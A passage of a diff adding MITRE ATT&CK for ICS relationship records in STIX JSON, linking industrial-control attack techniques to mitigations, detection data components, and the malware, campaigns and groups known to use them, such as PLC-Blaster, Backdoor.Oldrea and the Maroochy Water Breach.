"course-of-action--ad12819e-3211-4291-b360-069f280cff0a", + "target_ref": "attack-pattern--fab8fc7d-f27f-4fbb-9de6-44740aade05f", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--8334b3ab-f17f-460e-b627-ad85fc9c2409", + "created": "2022-05-11T16:22:58.805Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-27T16:42:35.018Z", + "description": "Monitor Windows registry keys that may be deleted or alter generated artifacts on a host system, including logs or captured files such as quarantined malware. For added context on adversary procedures and background see [Indicator Removal](https://attack.mitre.org/techniques/T1070) and applicable sub-techniques.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--1177a4c5-31c8-400c-8544-9071166afa0e", + "target_ref": "attack-pattern--53a26eee-1080-4d17-9762-2027d5a1b805", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--45ee1822-71e4-4d92-976d-306561b70555", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.106Z", + "relationship_type": "mitigates", + "description": "Segment operational network and systems to restrict access to critical system functions to predetermined management systems. (Citation: Department of Homeland Security September 2016)\n", + "source_ref": "course-of-action--1e7ccfc0-94c8-496e-8d27-032120892291", + "target_ref": "attack-pattern--25dfc8ad-bd73-4dfd-84a9-3c3d383f76e9", + "external_references": [ + { + "source_name": "Department of Homeland Security September 2016", + "description": "Department of Homeland Security 2016, September Retrieved. 2020/09/25 ", + "url": "https://us-cert.cisa.gov/sites/default/files/recommended_practices/NCCIC_ICS-CERT_Defense_in_Depth_2016_S508C.pdf" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--b5bb5ec3-aa3c-4734-8425-4be80c5658a9", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.143Z", + "relationship_type": "mitigates", + "description": "This technique may not be effectively mitigated against, consider controls for assets and processes that lead to the use of this technique.\n", + "source_ref": "course-of-action--469b78dd-a54d-4f7c-8c3b-4a1dd916b433", + "target_ref": "attack-pattern--36e9f5bc-ac13-4da4-a2f4-01f4877d9004", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--5c695f49-6c76-4818-88b6-4db2bf029e43", + "created": "2022-05-11T16:22:58.805Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-27T17:38:22.073Z", + "description": "Monitor for file creation in conjunction with other techniques (e.g., file transfers using [Remote Services](https://attack.mitre.org/techniques/T0886)).", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--2b3bfe19-d59a-460d-93bb-2f546adc2d2c", + "target_ref": "attack-pattern--ead7bd34-186e-4c79-9a4d-b65bcce6ed9d", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--c43fbdc0-4c1d-4ff8-9dd2-fd45199dcfaa", + "created": "2022-09-27T16:35:12.372Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T16:47:35.207Z", + "description": "Monitor for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--39b9db72-8b48-4595-a18d-db5bbba3091b", + "target_ref": "attack-pattern--cd2c76a4-5e23-4ca5-9c40-d5e0604f7101", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--d6a2a1a8-8f5b-4e94-8fce-8edd8a17627a", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.209Z", + "relationship_type": "mitigates", + "description": "When available utilize hardware and software root-of-trust to verify the authenticity of a system. This may be achieved through cryptographic means, such as digital signatures or hashes, of critical software and firmware throughout the supply chain.\n", + "source_ref": "course-of-action--71eb7dad-07eb-4bbc-9df0-ac57bf2fba4a", + "target_ref": "attack-pattern--5e0f75da-e108-4688-a6de-a4f07cc2cbe3", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--c67e3535-69a9-4234-8170-4ad6efc632b7", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.211Z", + "relationship_type": "mitigates", + "description": "Implement continuous monitoring of vulnerability sources. Also, use automatic and manual code review tools. (Citation: OWASP)\n", + "source_ref": "course-of-action--de0bc375-50e1-4e26-a342-a8ff8c9d3037", + "target_ref": "attack-pattern--5e0f75da-e108-4688-a6de-a4f07cc2cbe3", + "external_references": [ + { + "source_name": "OWASP", + "description": "OWASP Top 10 Web Application Security Risks Retrieved. 2020/09/25 ", + "url": "https://owasp.org/www-project-top-ten/" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--61668e93-6d9d-418d-9fbd-2d88c3a66544", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.199Z", + "relationship_type": "mitigates", + "description": "Segment operational assets and their management devices based on their functional role within the process. Enabling more strict isolation to more critical control and operational information within the control environment. (Citation: Karen Scarfone; Paul Hoffman September 2009) (Citation: Keith Stouffer May 2015) (Citation: Department of Homeland Security September 2016) (Citation: Dwight Anderson 2014) \n", + "source_ref": "course-of-action--1e7ccfc0-94c8-496e-8d27-032120892291", + "target_ref": "attack-pattern--b14395bd-5419-4ef4-9bd8-696936f509bb", + "external_references": [ + { + "source_name": "Karen Scarfone; Paul Hoffman September 2009", + "description": "Karen Scarfone; Paul Hoffman 2009, September Guidelines on Firewalls and Firewall Policy Retrieved. 2020/09/25 ", + "url": "https://nvlpubs.nist.gov/nistpubs/Legacy/SP/nistspecialpublication800-41r1.pdf" + }, + { + "source_name": "Keith Stouffer May 2015", + "description": "Keith Stouffer 2015, May Guide to Industrial Control Systems (ICS) Security Retrieved. 2018/03/28 ", + "url": "https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-82r2.pdf" + }, + { + "source_name": "Department of Homeland Security September 2016", + "description": "Department of Homeland Security 2016, September Retrieved. 2020/09/25 ", + "url": "https://us-cert.cisa.gov/sites/default/files/recommended_practices/NCCIC_ICS-CERT_Defense_in_Depth_2016_S508C.pdf" + }, + { + "source_name": "Dwight Anderson 2014", + "description": "Dwight Anderson 2014 Protect Critical Infrastructure Systems With Whitelisting Retrieved. 2020/09/25 ", + "url": "https://www.sans.org/reading-room/whitepapers/ICS/protect-critical-infrastructure-systems-whitelisting-35312" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--21041206-da58-45c7-adb0-db07caebdcb6", + "created": "2021-04-13T12:36:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Spenneberg, Ralf, Maik Brggemann, and Hendrik Schwartke March 2016", + "description": "Spenneberg, Ralf, Maik Brggemann, and Hendrik Schwartke 2016, March 31 Plc-blaster: A worm living solely in the plc. Retrieved. 2017/09/19 ", + "url": "https://www.blackhat.com/docs/asia-16/materials/asia-16-Spenneberg-PLC-Blaster-A-Worm-Living-Solely-In-The-PLC-wp.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T18:00:27.700Z", + "description": "[PLC-Blaster](https://attack.mitre.org/software/S1006) uses the system function blocks TCON and TDISCON to initiate and destroy TCP connections to arbitrary systems. Buffers may be sent and received on these connections with TRCV und TSEND system function blocks. (Citation: Spenneberg, Ralf, Maik Brggemann, and Hendrik Schwartke March 2016)", + "relationship_type": "uses", + "source_ref": "malware--4dcff507-5af8-47ce-964a-8d9569e9ccfe", + "target_ref": "attack-pattern--b52870cc-83f3-473c-b895-72d91751030b", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--2089201c-c1c6-4d92-a737-a6499e26ee7f", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.094Z", + "relationship_type": "mitigates", + "description": "Provide operators with redundant, out-of-band communication to support monitoring and control of the operational processes, especially when recovering from a network outage (Citation: National Institute of Standards and Technology April 2013). Out-of-band communication should utilize diverse systems and technologies to minimize common failure modes and vulnerabilities within the communications infrastructure. For example, wireless networks (e.g., 3G, 4G) can be used to provide diverse and redundant delivery of data.\n", + "source_ref": "course-of-action--b11cad63-ef30-4eb8-af0d-6cc46eef3f3e", + "target_ref": "attack-pattern--e33c7ecc-5a38-497f-beb2-a9a2049a4c20", + "external_references": [ + { + "source_name": "National Institute of Standards and Technology April 2013", + "description": "National Institute of Standards and Technology 2013, April Security and Privacy Controls for Federal Information Systems and Organizations Retrieved. 2020/09/17 ", + "url": "https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-53r4.pdf" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--f2e6103d-ca06-45c4-8fe9-049687fc4361", + "created": "2022-05-11T16:22:58.803Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-26T15:38:17.130Z", + "description": "Monitor for loss of expected operational process alarms which could indicate alarms are being suppressed. As noted in the technique description, there may be multiple sources of alarms in an ICS environment. Discrepancies between alarms may indicate the adversary is suppressing some but not all the alarms in the environment. This will not directly detect the technique’s execution, but instead may provide additional evidence that the technique has been used and may complement other detections.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--4c12c1c8-bcef-4daf-8e5b-fca235f71d9e", + "target_ref": "attack-pattern--2900bbd8-308a-4274-b074-5b8bde8347bc", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--a1383f2a-2ee2-47df-a661-8904a7535e0c", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.233Z", + "relationship_type": "mitigates", + "description": "Applications and appliances that utilize default username and password should be changed immediately after the installation, and before deployment to a production environment. (Citation: CISA June 2013)\n", + "source_ref": "course-of-action--5d97c693-e054-48ba-a3a3-eaf6942dfb65", + "target_ref": "attack-pattern--cd2c76a4-5e23-4ca5-9c40-d5e0604f7101", + "external_references": [ + { + "source_name": "CISA June 2013", + "description": "CISA 2013, June Risks of Default Passwords on the Internet Retrieved. 2020/09/25 ", + "url": "https://us-cert.cisa.gov/ncas/alerts/TA13-175A" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--ae7487f1-a2d0-443d-b418-cd726c5ac15f", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.167Z", + "relationship_type": "mitigates", + "description": "Network connection enumeration is likely obtained by using common system tools (e.g., netstat, ipconfig).\n", + "source_ref": "course-of-action--469b78dd-a54d-4f7c-8c3b-4a1dd916b433", + "target_ref": "attack-pattern--ea0c980c-5cf0-43a7-a049-59c4c207566e", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--3f76d408-be8a-478e-8a5a-aab1d1f96572", + "created": "2018-04-18T17:59:24.739Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "Julian Rrushi, Hassan Farhangi, Clay Howey, Kelly Carmichael, Joey Dabell December 2015", + "url": "https://pdfs.semanticscholar.org/18df/43ef1690b0fae15a36f770001160aefbc6c5.pdf", + "description": "Julian Rrushi, Hassan Farhangi, Clay Howey, Kelly Carmichael, Joey Dabell 2015, December 08 A Quantitative Evaluation of the Target Selection of Havex ICS Malware Plugin Retrieved. 2019/04/01 " + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "The [Backdoor.Oldrea](https://attack.mitre.org/software/S0093) ICS malware plugin relies on Windows networking (WNet) to discover all the servers, including OPC servers, that are reachable by the compromised machine over the network. (Citation: Julian Rrushi, Hassan Farhangi, Clay Howey, Kelly Carmichael, Joey Dabell December 2015)", + "modified": "2022-08-11T13:23:12.321Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "uses", + "source_ref": "malware--083bb47b-02c8-4423-81a2-f9ef58572974", + "target_ref": "attack-pattern--d5a69cfb-fc2a-46cb-99eb-74b236db5061", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--adf2072c-0341-4fc2-9d25-495b4af864e9", + "created": "2023-03-10T20:09:22.370Z", + "revoked": false, + "external_references": [ + { + "source_name": "Marshall Abrams July 2008", + "description": "Marshall Abrams 2008, July 23 Malicious Control System Cyber Security Attack Case Study Maroochy Water Services, Australia Retrieved. 2018/03/27 ", + "url": "https://www.mitre.org/sites/default/files/pdf/08_1145.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-10T20:09:22.370Z", + "description": "In the [Maroochy Water Breach](https://attack.mitre.org/campaigns/C0020), the adversary temporarily shut an investigator out of the network preventing them from issuing any controls.(Citation: Marshall Abrams July 2008)", + "relationship_type": "uses", + "source_ref": "campaign--70cab19e-1745-425e-b3db-c02cd5ff157a", + "target_ref": "attack-pattern--e33c7ecc-5a38-497f-beb2-a9a2049a4c20", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--86f1655a-db46-4d49-9051-6653da83eb13", + "created": "2020-09-21T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Keith Stouffer May 2015", + "description": "Keith Stouffer 2015, May Guide to Industrial Control Systems (ICS) Security Retrieved. 2018/03/28 ", + "url": "https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-82r2.pdf" + }, + { + "source_name": "National Institute of Standards and Technology April 2013", + "description": "National Institute of Standards and Technology 2013, April Security and Privacy Controls for Federal Information Systems and Organizations Retrieved. 2020/09/17 ", + "url": "https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-53r4.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-30T19:13:57.066Z", + "description": "Protect files with proper permissions to limit opportunities for adversaries to interact and collect information from databases. (Citation: Keith Stouffer May 2015) (Citation: National Institute of Standards and Technology April 2013)\n", + "relationship_type": "mitigates", + "source_ref": "course-of-action--f9fcb3ec-6de0-4559-8cd9-ef1c0c7d1971", + "target_ref": "attack-pattern--3405891b-16aa-4bd7-bd7c-733501f9b20f", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--b47dbc50-fd8f-4e5b-bb3d-e93b68bf5497", + "created": "2020-09-21T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-21T14:34:42.612Z", + "description": "Limit access to network infrastructure and resources that can be used to reshape traffic or otherwise produce AiTM conditions.\n", + "relationship_type": "mitigates", + "source_ref": "course-of-action--bcf91ebc-f316-4e19-b2f6-444e9940c697", + "target_ref": "attack-pattern--9a505987-ab05-4f46-a9a6-6441442eec3b", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--edb32a4d-62a3-467c-8dfa-f97f1bcbffc6", + "created": "2022-09-27T16:56:30.665Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T16:39:41.897Z", + "description": "Monitor for newly constructed scheduled jobs that may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--f42df6f0-6395-4f0c-9376-525a031f00c3", + "target_ref": "attack-pattern--ba203963-3182-41ac-af14-7e7ebc83cd61", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--a82e9f8a-f81e-407a-b284-e0ae5f055c61", + "created": "2022-05-11T16:22:58.805Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T19:39:30.850Z", + "description": "Monitor for changes made to a file may delete or alter generated artifacts on a host system, including logs or captured files such as quarantined malware.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--84572de3-9583-4c73-aabd-06ea88123dd8", + "target_ref": "attack-pattern--53a26eee-1080-4d17-9762-2027d5a1b805", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--7d6c4a00-acde-40af-bf91-a4ef009cf135", + "created": "2020-09-21T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-08T22:29:53.545Z", + "description": "Devices that allow remote management of firmware should require authentication before allowing any changes. The authentication mechanisms should also support [Account Use Policies](https://attack.mitre.org/mitigations/M0936), [Password Policies](https://attack.mitre.org/mitigations/M0927), and [User Account Management](https://attack.mitre.org/mitigations/M0918).", + "relationship_type": "mitigates", + "source_ref": "course-of-action--66cfe23e-34b6-4583-b178-ed6a412db2b0", + "target_ref": "attack-pattern--efbf7888-f61b-4572-9c80-7e2965c60707", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--e4a11381-8608-4c71-966f-df0cbb834fe0", + "created": "2022-09-30T15:35:09.660Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T16:51:08.392Z", + "description": "Monitor for new ICS protocol connections to existing assets or for device scanning (i.e., a host connecting to many devices) over ICS and enterprise protocols (e.g., ICMP, DCOM, WinRM). For added context on adversary enterprise procedures and background see [Remote System Discovery](https://attack.mitre.org/techniques/T1018).", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--a7f22107-02e5-4982-9067-6625d4a1765a", + "target_ref": "attack-pattern--d5a69cfb-fc2a-46cb-99eb-74b236db5061", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--2daeeaaa-5b4b-4bb7-a94d-78a5749027ca", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.126Z", + "relationship_type": "mitigates", + "description": "Limit access to remote services through centrally managed concentrators such as VPNs and other managed remote access systems.\n", + "source_ref": "course-of-action--49b306c1-a046-42c5-a4d2-30f264ada110", + "target_ref": "attack-pattern--8d2f3bab-507c-4424-b58b-edc977bd215c", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--245c8c36-28e5-4508-a585-7768cb33299a", + "created": "2023-03-10T20:06:10.209Z", + "revoked": false, + "external_references": [ + { + "source_name": "Marshall Abrams July 2008", + "description": "Marshall Abrams 2008, July 23 Malicious Control System Cyber Security Attack Case Study Maroochy Water Services, Australia Retrieved. 2018/03/27 ", + "url": "https://www.mitre.org/sites/default/files/pdf/08_1145.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-10T20:06:10.209Z", + "description": "In the [Maroochy Water Breach](https://attack.mitre.org/campaigns/C0020), the adversary gained remote computer access to the system over radio.(Citation: Marshall Abrams July 2008)", + "relationship_type": "uses", + "source_ref": "campaign--70cab19e-1745-425e-b3db-c02cd5ff157a", + "target_ref": "attack-pattern--8d2f3bab-507c-4424-b58b-edc977bd215c", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--eeeaa0d4-0ca0-468e-ae13-43ab7aba61b4", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.231Z", + "relationship_type": "mitigates", + "description": "Consider configuration and use of a network-wide authentication service such as Active Directory, LDAP, or RADIUS capabilities which can be found in ICS devices. (Citation: Keith Stouffer May 2015) (Citation: Schweitzer Engineering Laboratories August 2015)\n", + "source_ref": "course-of-action--2f0160b7-e982-49d7-9612-f19b810f1722", + "target_ref": "attack-pattern--cd2c76a4-5e23-4ca5-9c40-d5e0604f7101", + "external_references": [ + { + "source_name": "Keith Stouffer May 2015", + "description": "Keith Stouffer 2015, May Guide to Industrial Control Systems (ICS) Security Retrieved. 2018/03/28 ", + "url": "https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-82r2.pdf" + }, + { + "source_name": "Schweitzer Engineering Laboratories August 2015", + "description": "Schweitzer Engineering Laboratories 2015, August Understanding When to Use LDAP or RADIUS for Centralized Authentication Retrieved. 2020/09/25 ", + "url": "https://cdn.selinc.com/assets/Literature/Publications/Application%20Notes/AN2015-08_20150817.pdf?" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--7e87ce08-a428-4e55-876e-80d2760121a5", + "created": "2022-05-11T16:22:58.803Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T19:37:35.099Z", + "description": "Monitor executed commands and arguments for actions that could be taken to collect internal data.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--685f917a-e95e-4ba0-ade1-c7d354dae6e0", + "target_ref": "attack-pattern--3de230d4-3e42-4041-b089-17e1128feded", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--f65a8ce8-90fa-4d92-a0dc-3ee544c541fe", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Dragos", + "description": "Dragos Chrysene Retrieved. 2019/10/27 ", + "url": "https://dragos.com/resource/chrysene/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T16:32:49.409Z", + "description": "[OilRig](https://attack.mitre.org/groups/G0049) utilized stolen credentials to gain access to victim machines.(Citation: Dragos)", + "relationship_type": "uses", + "source_ref": "intrusion-set--4ca1929c-7d64-4aab-b849-badbfc0c760d", + "target_ref": "attack-pattern--cd2c76a4-5e23-4ca5-9c40-d5e0604f7101", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": 